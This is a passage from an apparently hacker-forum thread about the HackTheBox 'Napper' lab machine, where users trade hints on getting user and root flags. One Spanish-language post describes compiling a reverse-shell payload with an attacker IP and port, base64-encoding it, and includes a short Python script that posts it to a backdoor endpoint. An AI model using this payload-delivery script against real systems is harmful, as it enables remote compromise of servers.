Nov 11, 2023, 08:56 PM
I have been trying to make several payloads but it has not been possible
|
HTB - Napper
by peRd1 - Saturday November 11, 2023 at 07:18 PM
|
|
Nov 11, 2023, 08:56 PM
I have been trying to make several payloads but it has not been possible
Nov 11, 2023, 09:01 PM
7680/tcp open pando-pub?
Nov 11, 2023, 09:10 PM
I also tried to set base64 .net assembly payload- in /ews/MsExgHealthCheckd/ but it doesn't work , any ideas?
Nov 12, 2023, 12:01 AM
msfvenom the way to go or does that get caught by defender?
Nov 12, 2023, 01:31 AM
I've already got the user flag, any clues about root?
Nov 12, 2023, 01:55 AM
Nov 12, 2023, 01:59 AM
Something with the `a.exe` or the elastic creds
Nov 12, 2023, 01:59 AM
Nov 12, 2023, 03:07 AM
I am trying to use chisel to forward the port, but it is not working for me
Nov 12, 2023, 03:25 AM
Para la bandera del usuario usen:
https://gist.github.com/BankSecurity/55f...b79b2a83cc En el enlace encuentran un archivo .cv solo le cambian la IP el puerto y deben de ponerme donde dice powershell se lo cambian a cmd.exe y compilan el archivo y luego lo pasan a base 64 que es el que pone payload: Base64 -w0 payload.exe | xclip -sel clip donde dice payload.exe es despues de la compilacion que deben de hacer con el link que les deje adjunto adicional hay un PoC import requests from urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) hosts=["napper.htb"] payload = "<>" form_field=f"sdafwe3rwe23={requests.utils.quote(payload)}" for h in hosts: url_ssl= f"https://{h}/ews/MsExgHealthCheckd/" try: r_ssl = requests.post(url_ssl, data=form_field, verify=False) print(f"{url_ssl} : {r_ssl.status_code} {r_ssl.headers}") except KeyboardInterupt: exit() except Exception as e: print("e") pass |
|
« Next Oldest | Next Newest »
|
| Possibly Related Threads… | |||||
| Thread | Author | Replies | Views | Last Post | |
| Hack the box Pro Labs, VIP, VIP+ 1 month free Method | 23 | 2,189 |
2 hours ago Last Post: kkkato |
||
| [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags | 20 | 2,495 |
Yesterday, 11:06 PM Last Post: op334 |
||
|
|
[FREE] HackTheBox All Cheatsheets | 3 | 398 |
Yesterday, 10:36 PM Last Post: op334 |
|
| [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired | 369 | 92,017 |
Yesterday, 04:10 PM Last Post: sabbyahmed |
||
| CBBH Write Ups | 22 | 6,229 |
Yesterday, 06:39 AM Last Post: Usercomplex |
||